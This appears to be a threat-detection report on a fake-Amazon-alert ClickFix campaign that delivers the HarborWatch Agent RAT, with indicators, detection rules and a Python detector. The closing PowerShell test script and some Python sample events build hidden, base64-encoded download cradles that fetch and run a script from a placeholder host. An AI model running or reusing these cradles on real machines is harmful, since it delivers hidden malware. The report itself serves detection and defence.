From Fake Amazon Security Alert to HarborWatch Agent Delivery
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report details a phishing campaign built around a fake Amazon security alert that tricks victims into running a PowerShell command through a ClickFix-style prompt. That command downloads a malicious executable named mysql.exe, which is in fact the HarborWatch Agent RAT. Once launched, the malware connects to a command-and-control server and transmits host information. The operation relies on look-alike domains and a user-driven self-infection method to avoid traditional attachment-based detection.
Investigation
Cofense traced the campaign from the spoofed sender address through the malicious domains, the PowerShell downloader, and the final malware payload. Dynamic analysis of mysql.exe revealed outbound communication with a command-and-control server at 185.193.127.44 and use of the API paths /api/agent/tasks/ and /api/heartbeat. Memory analysis also exposed the identifier HarborWatchAgent/c-1.1.1.
Mitigation
Organizations should block the identified malicious domains and IP addresses, restrict PowerShell execution of encoded commands, monitor for unexpected creation of mysql.exe in the Temp directory, and strengthen email defenses against brand impersonation and spoofed alerts.
Response
If this activity is detected, isolate the affected endpoint, terminate the HarborWatch Agent process, collect forensic evidence, and deploy indicator-based blocking across the environment. Users should also be warned about the fake Amazon security alert, and phishing protections should be updated to catch similar lures.
Attack Flow

```mermaid
graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef malware fill:#ff6666
    classDef process fill:#ffcc99
    classDef file fill:#cccccc

    %% Nodes
    initial_access_phishing["<b>Action</b> – <b>T1566.002 Spearphishing Link</b><br/>Email appears to be from Amazon and contains a malicious verification link."]
    class initial_access_phishing action
    user_execution_malicious_link["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>Victim clicks the link and is taken to a page that instructs them to copy-paste a PowerShell command."]
    class user_execution_malicious_link action
    user_execution_copy_paste["<b>Action</b> – <b>T1204.004 User Execution: Copy and Paste</b><br/>Copied PowerShell command is executed locally."]
    class user_execution_copy_paste action
    obfuscation_obfuscated_files["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b> & <b>T1027.018 Invisible Unicode</b><br/>PowerShell command is base64-encoded and contains hidden Unicode characters."]
    class obfuscation_obfuscated_files action
    deobfuscate_decode["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Command decodes the payload at runtime."]
    class deobfuscate_decode action
    hide_artifact_hidden_window["<b>Action</b> – <b>T1564.003 Hidden Window</b><br/>PowerShell runs with -w hidden to avoid UI."]
    class hide_artifact_hidden_window action
    ingress_tool_transfer["<b>Action</b> – <b>T1105 Ingress Tool Transfer</b><br/>Script downloads a second-stage PowerShell script (code.txt) from a remote server."]
    class ingress_tool_transfer action
    server_software_component["<b>Action</b> – <b>T1505 Server Software Component</b><br/>Second script retrieves and executes a payload (mysql.exe) placed in %TEMP%."]
    class server_software_component action
    remote_access_tool["<b>Malware</b> – <b>T1219 Remote Access Tool</b><br/>Custom RAT named HarborWatch Agent is executed."]
    class remote_access_tool malware
    discovery_security_software["<b>Action</b> – <b>T1518.001 Security Software Discovery</b><br/>RAT collects security software information."]
    class discovery_security_software action
    discovery_hardware["<b>Action</b> – <b>T1592.001 Hardware Discovery</b><br/>RAT gathers hardware details of the host."]
    class discovery_hardware action
    discovery_network_appliances["<b>Action</b> – <b>T1590.006 Network Security Appliances</b><br/>RAT enumerates network security devices."]
    class discovery_network_appliances action
    discovery_log_enumeration["<b>Action</b> – <b>T1654 Log Enumeration</b><br/>RAT enumerates event logs."]
    class discovery_log_enumeration action
    discovery_threat_vendor["<b>Action</b> – <b>T1681 Search Threat Vendor Data</b><br/>RAT searches for threat intelligence."]
    class discovery_threat_vendor action
    c2_bidirectional["<b>Action</b> – <b>T1102.002 Web Service Bidirectional Communication</b><br/>Data is sent to C2 server via HTTPS."]
    class c2_bidirectional action
    c2_oneway["<b>Action</b> – <b>T1102.003 Web Service One-Way Communication</b><br/>Additional instructions retrieved via HTTPS."]
    class c2_oneway action
    c2_dynamic_resolution["<b>Action</b> – <b>T1568 Dynamic Resolution</b><br/>RAT resolves C2 domains at runtime."]
    class c2_dynamic_resolution action
    c2_dga["<b>Action</b> – <b>T1568.002 Domain Generation Algorithms</b><br/>Domain list generated algorithmically."]
    class c2_dga action
    c2_dead_drop_resolver["<b>Action</b> – <b>T1102.001 Dead Drop Resolver</b><br/>Retrieves extra C2 instructions from dead-drop site."]
    class c2_dead_drop_resolver action
    exfiltration_c2["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/>Collected information exfiltrated through the same web channel."]
    class exfiltration_c2 action
    exfiltration_alternative["<b>Action</b> – <b>T1048 Exfiltration Over Alternative Protocol</b><br/>Alternative protocol used for data exfiltration."]
    class exfiltration_alternative action
    discovery_cloud_dashboard["<b>Action</b> – <b>T1538 Cloud Service Dashboard</b><br/>Data displayed on Chinese-language web panel (Harbor Sentinel)."]
    class discovery_cloud_dashboard action

    %% Connections
    initial_access_phishing -->|leads to| user_execution_malicious_link
    user_execution_malicious_link -->|leads to| user_execution_copy_paste
    user_execution_copy_paste -->|triggers| obfuscation_obfuscated_files
    obfuscation_obfuscated_files -->|decoded by| deobfuscate_decode
    deobfuscate_decode -->|executes| hide_artifact_hidden_window
    hide_artifact_hidden_window -->|downloads| ingress_tool_transfer
    ingress_tool_transfer -->|downloads| server_software_component
    server_software_component -->|executes| remote_access_tool
    remote_access_tool -->|performs| discovery_security_software
    remote_access_tool -->|performs| discovery_hardware
    remote_access_tool -->|performs| discovery_network_appliances
    remote_access_tool -->|performs| discovery_log_enumeration
    remote_access_tool -->|performs| discovery_threat_vendor
    remote_access_tool -->|communicates via| c2_bidirectional
    remote_access_tool -->|receives via| c2_oneway
    c2_bidirectional -->|uses| c2_dynamic_resolution
    c2_dynamic_resolution -->|uses| c2_dga
    c2_oneway -->|uses| c2_dead_drop_resolver
    remote_access_tool -->|exfiltrates via| exfiltration_c2
    exfiltration_c2 -->|may also use| exfiltration_alternative
    remote_access_tool -->|reports to| discovery_cloud_dashboard
```
Detections
- Possible ClickFix Attack Patterns In Command Line (via cmdline)
- The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
- Suspicious Powershell Strings (via cmdline)
- Suspicious Powershell Strings (via powershell)
- Call Suspicious .NET Methods from Powershell (via powershell)
- IOCs (HashSha256) to detect: From Fake Amazon Security Alert to HarborWatch Agent ClickFix Delivery of a Custom Monitoring RAT
- IOCs (HashMd5) to detect: From Fake Amazon Security Alert to HarborWatch Agent ClickFix Delivery of a Custom Monitoring RAT
- IOCs (SourceIP) to detect: From Fake Amazon Security Alert to HarborWatch Agent ClickFix Delivery of a Custom Monitoring RAT
- IOCs (DestinationIP) to detect: From Fake Amazon Security Alert to HarborWatch Agent ClickFix Delivery of a Custom Monitoring RAT
- Execution of mysql.exe with Specific Password Argument [Windows Process Creation]
- HarborWatch Agent C2 Communication Detection [Windows Network Connection]
- Detect PowerShell Execution with Obfuscation and Hidden Window [Windows Powershell]
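The core logic behind the three custom rules above (hidden/encoded PowerShell, mysql.exe launched from Temp, and HarborWatch C2 traffic), written out as an added Python example; this is not the page's, Cofense's, or the rule vendor's own code. The point it makes that a rule listing cannot: the -EncodedCommand argument is base64 over UTF-16LE, so a plain CommandLine|contains 'DownloadString' filter never sees the cradle, and the check has to decode the argument first. The Sysmon-style field names (Image, CommandLine, DestinationIp), the proxy-style Url/UserAgent fields, the cradle URL and all sample events are constructed assumptions; only the C2 IP, API paths and agent identifier come from the report. The page does not give the mysql.exe password argument, so that rule is approximated here by the Temp-directory path alone.

```python
"""Detection logic for the HarborWatch Agent ClickFix chain, run over constructed sample events.

Added example, not code from the page or the vendor. Field names are Sysmon/proxy-style assumptions.
"""
import base64
import re
from typing import Dict, List

# Indicators taken from the report above. Everything else in this file is constructed for illustration.
C2_IP = "185.193.127.44"
C2_PATHS = ("/api/agent/tasks/", "/api/heartbeat")
AGENT_ID = "HarborWatchAgent/c-1.1.1"

# -w hidden / -WindowStyle Hidden, and the usual -EncodedCommand abbreviations (-e, -ec, -en, -enc).
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
# Download-cradle tokens, matched only AFTER decoding: they never appear literally in the base64.
CRADLE_RE = re.compile(r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|iwr)\b")


def encode_command(script: str) -> str:
    """Build a -EncodedCommand value the way PowerShell expects it: UTF-16LE bytes, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload from a command line, or '' if absent or invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def check_process(ev: Dict[str, str]) -> List[str]:
    """Process-creation checks: hidden+encoded PowerShell, cradle in the decoded payload, mysql.exe in Temp."""
    hits: List[str] = []
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        if HIDDEN_RE.search(cmd) and ENCODED_RE.search(cmd):
            hits.append("hidden window + encoded command")
        decoded = decode_encoded_command(cmd)
        if decoded and CRADLE_RE.search(decoded):
            hits.append("download cradle in decoded command")
    # Assumption: the report's password argument is unknown, so the Temp path alone stands in for that rule.
    if image.endswith("\\mysql.exe") and "\\temp\\" in image:
        hits.append("mysql.exe launched from a Temp directory")
    return hits


def check_network(ev: Dict[str, str]) -> List[str]:
    """Network/proxy checks: reported C2 address, agent API paths, agent identifier string."""
    hits: List[str] = []
    if ev.get("DestinationIp") == C2_IP:
        hits.append("connection to reported C2 IP")
    if any(p in ev.get("Url", "") for p in C2_PATHS):
        hits.append("HarborWatch agent API path")
    if AGENT_ID in ev.get("UserAgent", ""):
        hits.append("HarborWatch agent identifier")
    return hits


def scan(events: List[Dict[str, str]]) -> List[str]:
    """Run both checks over a list of events and return 'EventId: reason' alert strings."""
    alerts: List[str] = []
    for ev in events:
        for reason in check_process(ev) + check_network(ev):
            alerts.append(f"{ev['Id']}: {reason}")
    return alerts


# Constructed sample telemetry: a ClickFix cradle, a benign encoded command, the RAT launch, one C2 beacon.
CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://cradle.invalid/code.txt")'
SAMPLE_EVENTS = [
    {"Id": "p1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand " + encode_command(CRADLE)},
    {"Id": "p2", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand " + encode_command("Get-Service -Name Spooler")},
    {"Id": "p3", "Image": r"C:\Users\alice\AppData\Local\Temp\mysql.exe", "CommandLine": "mysql.exe"},
    {"Id": "n1", "DestinationIp": C2_IP, "Url": "http://185.193.127.44/api/heartbeat", "UserAgent": AGENT_ID},
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print(line)
```

Event p2 shows why the decode step matters in both directions: an encoded command on its own is common in legitimate management tooling, so the rule should need the hidden-window flag or a cradle in the decoded text before it alerts, not the bare presence of -EncodedCommand.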
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
An attacker has obtained a foothold on the endpoint and wishes to download and execute a further payload while remaining hidden from the user. They craft a PowerShell one-liner that:
- Runs without a profile (-nop) so that no profile scripts, and any logging or hooks they carry, are loaded.
- Starts in a hidden window (-w hidden) so that no console is shown to the user (T1564.003).
- Carries a base64-encoded download cradle (IEX over DownloadString) so that none of the cradle's strings appear literally in the command line (T1027.010).
- Passes that payload via -EncodedCommand, which PowerShell decodes (base64 over UTF-16LE) and executes (T1059.001).
The resulting command line matches the Sigma rule's CommandLine|contains filters (hidden window plus encoded command), thereby generating the expected alert. Because the payload is UTF-16LE before base64 encoding, filters that look for cradle strings such as DownloadString in the raw command line will not fire on it; a rule that wants those strings must decode the argument first.
Regression Test Script:
```powershell
# -------------------------------------------------
# Malicious PowerShell execution that should trigger the Sigma rule
# -------------------------------------------------
# Download cradle that will be hidden inside -EncodedCommand. The host does not resolve,
# so the child process only needs to live long enough to produce the command-line telemetry.
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://malicious.example.com/payload.ps1")'

# -EncodedCommand expects base64 of the UTF-16LE bytes ([Text.Encoding]::Unicode), not UTF-8
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

# -nop: no profile; -w hidden: hidden window (T1564.003)
$cmd = "-nop -w hidden -EncodedCommand $b64"

Start-Process -FilePath "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe" `
              -ArgumentList $cmd `
              -WindowStyle Hidden
# End of script
```
Cleanup Commands:
```powershell
# Terminate any lingering PowerShell processes spawned by the test, but never the session
# running this cleanup ($PID). Note this still stops any other powershell.exe on the host;
# on a shared system, filter on StartTime or the child's known process ID instead.
Get-Process -Name powershell -ErrorAction SilentlyContinue |
    Where-Object { $_.Id -ne $PID } |
    Stop-Process -Force

# Remove any temporary files (none created in this case)

# Delete the payload variables from the session (optional)
Remove-Variable -Name payload, b64, cmd -ErrorAction SilentlyContinue
```